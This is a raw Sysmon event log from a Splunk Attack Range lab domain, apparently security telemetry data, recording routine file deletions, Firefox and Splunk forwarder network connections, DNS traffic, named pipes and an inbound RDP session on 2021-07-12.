08:06:58.250{466BC892-5A42-60E8-C510-00000000CF01}7816ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exeC:\Users\bob\AppData\Local\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\7816.xml~RFf76c34c.TMPMD5=4553D3891EC8198EC956E59A7FA89664,SHA256=7DA31B28073EC76DCCA7EDFC3709014058FE36DCB6626D30538493EE344D57A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054378Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:58.212{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E8FAA46AD43BF45CFAD1634A8CC73E8,SHA256=516F8BC22E1AE6B2901922BC11A0C3F03AF5EAD14927C2DF683D30EC0E044E47,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054377Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.525{466BC892-3462-60E8-100C-00000000CF01}8944C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\bobtcptruefalse10.0.1.14win-dc-890.attackrange.local61956-false13.32.25.34server-13-32-25-34.fra56.r.cloudfront.net443https 354300x80000000000000001054376Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.524{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local55703- 354300x80000000000000001054375Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.470{466BC892-3462-60E8-100C-00000000CF01}8944C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\bobtcptruefalse10.0.1.14win-dc-890.attackrange.local61955-false13.224.193.99server-13-224-193-99.fra2.r.cloudfront.net443https 354300x80000000000000001054374Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.466{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local63326- 23542300x8000000000000000810232Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:59.930{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDF3E5B4C4F6D17E9E74AD2D8245B877,SHA256=3DDB38F9B8D137B520E6301133D6D121366D3B93205A1A87FBCC2EF00AD83FE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054384Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:59.249{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5867DD88137FB8C3F3211699AB6C4DCD,SHA256=8F839242CC4770FA6FC5C7D5A2E703B25B3B29F1D47AC43D29CF9F0FEE966C07,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054383Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.841{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61957-false10.0.1.12-8089- 23542300x8000000000000000810233Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:00.961{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0AFA170CD541703DB3D2D4B32324BC52,SHA256=1D8686C1F0723F74DF886816C9FFB6ED0553DED93D058972BAB630E5A513D49C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054390Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:00.748{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001054389Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:00.748{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001054388Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:00.748{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f 10341000x80000000000000001054387Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:00.748{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 23542300x80000000000000001054386Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:00.748{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFf76cd10.TMPMD5=FEEDDF0B48ACBAE2DF2C13E094BA61E1,SHA256=564E4AC53FEF38F8EC2ADC3773CA3AE2E546D9CF626CDED40CA8B8DCCA4D789B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054385Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:00.264{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=718B04DE6DA187135572E1365C51B041,SHA256=E7D2BE219462ABC65D4F6A44CD9955610F7DA54A30AB47B6188C9E2BC14FB271,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810235Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:01.963{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C50743BFC63DF933BF93135DAD479424,SHA256=893B253AA9990F5DD23603C89E85F60DD284286ECE17DD4D7AB51A4641A3F87C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810234Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:00.282{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57453-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001054391Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:01.279{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B79A30FE3962475F2E191F463805062,SHA256=B70323EAE2DFB6D73A1273931A63D1E14C07DE83F62F0602450C7E3B446C7A61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810236Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:02.976{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E65A72D8D6B5359E101A49A258B6FF7,SHA256=DD0C2E4D71B8D55D663FAD8A65B3CB0E6FBEA07B40E4FBC46BF0F0E5C99CA68A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054393Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:53.754{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61958-false10.0.1.12-8000- 23542300x80000000000000001054392Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:02.295{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDE01B459E2F637578ADCD59F2CFBA6B,SHA256=A371BFF7660988D0CF59128C944B27EA3A1F122230104D05F3AA5F05FE5F3991,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810237Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:03.994{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B56E4F02D13022529F6A2A70C23BF20,SHA256=107B33A6BE0E602AD299B250A6440292B94706C68C01A3BA9B545E9E18E13589,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054394Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:03.309{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BD5F7402FD7C0AD3F3A3BF9D4ABA0EA,SHA256=AE137110F70D9615CE9F169999D9FD06F77D1F4833B65370176EA8730993D87F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054395Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:04.327{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D82F2B18A57C60D51F84BD738F27B842,SHA256=7660D4FEC689D0405BC3C83E84683D9AA5CB28568FA8B66ACB50E71A697ED3B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054396Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:05.330{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C07E81D87618B3CAE2EE6FFD460C4AF,SHA256=EB1C8BC589432CD84CE2226612A1857E49B7CCF8FCAF7C34116D4E2EA3A502D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810238Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:05.025{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6530DAC6E5E0B0E3F9FDD6A16217264D,SHA256=140E05CDC250CA2D09B5F2DE3BB9852602B4521C70C388EA0EC0CA9B70A60C0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810239Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:06.026{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7A2F2F7763CBD0CEDDCAFFBA81C0BA2,SHA256=7AD8D635D1289566E1C41673D3B840D595E7A5008E5C10DA0E9F03943D353BAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054403Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:06.499{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054402Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:06.453{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001054401Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:06.453{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001054400Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 08:07:06.453{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.6264.1217.144631910C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001054399Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:07:06.453{466BC892-3465-60E8-160C-00000000CF01}6264\chrome.6264.1217.144631910C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001054398Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:06.335{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C4E569A5DEC9A5AACD0CD7F1ADC05CE,SHA256=ABD798FB8BD6026B3058B8C6913771F2F8CA9EB5881B040FE3A31B5D201045B4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054397Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:58.316{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse195.78.54.188-6118-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001054406Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:07.343{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67297C3EDD61B5E07CE16498881AC6FE,SHA256=D8BE9F40749DF1E1F22251194A041418A63834CE2FA554A1A43A50249CF51D03,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810241Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:06.252{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57454-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810240Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:07.057{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E63EA849E49F1EF198BC75B76F4BEC80,SHA256=2C9E7ACE05E898DE2950137740742266671EE0C83A7A77CCFD9D56561F63CB46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054405Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:07.016{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=30D2E6035CAD857621204B0CD834135B,SHA256=DB5BD2817816EDC8F9581206BE7A803798CB35FE8700A228DE97A1F055D3AF6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054404Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:07.016{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D14BAF98E43BE38173E045C9AA69D8E7,SHA256=15D98960A32AEEB58475A7E9187B9F95AC6E28BCCA6E7DC0A03E4BB302C73E17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054408Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:08.373{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCCD21F646514C9C81C27EC82344A66F,SHA256=437AB98DC63AAB59DBF71E81A030B8040CB9C52D8D6CEF20A2CDB9369ADCBAC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810242Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:08.072{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4C2705B0CE2A9DFFB7B51A1FC17D9DF,SHA256=030CADA4E82DC891BCD7361150300670575AAC4138DB7DBA22D895C59051B9ED,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054407Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:59.579{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61959-false10.0.1.12-8000- 11241100x80000000000000001054413Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:09.519{466BC892-3152-60E8-240B-00000000CF01}3328C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\axpgvkas.default-release\SiteSecurityServiceState.txt2021-07-09 11:26:57.628 23542300x80000000000000001054412Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:09.519{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\axpgvkas.default-release\SiteSecurityServiceState.txtMD5=0FA77B01924B1510B06EC68F54F22C2C,SHA256=95908181DBDB5D9389F3C8B96E11087510A6853C37B7392544F14CBC509962B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054411Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:09.388{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06A389AA23F7D6B9A9717E3771375ED4,SHA256=AD92D19AADA1F81ABAA46B5376C3A21C59A3D13A5EF7A80E0A9D13B48BE88D9D,IMPHASH=00000000000000000000000000000000falsetrue 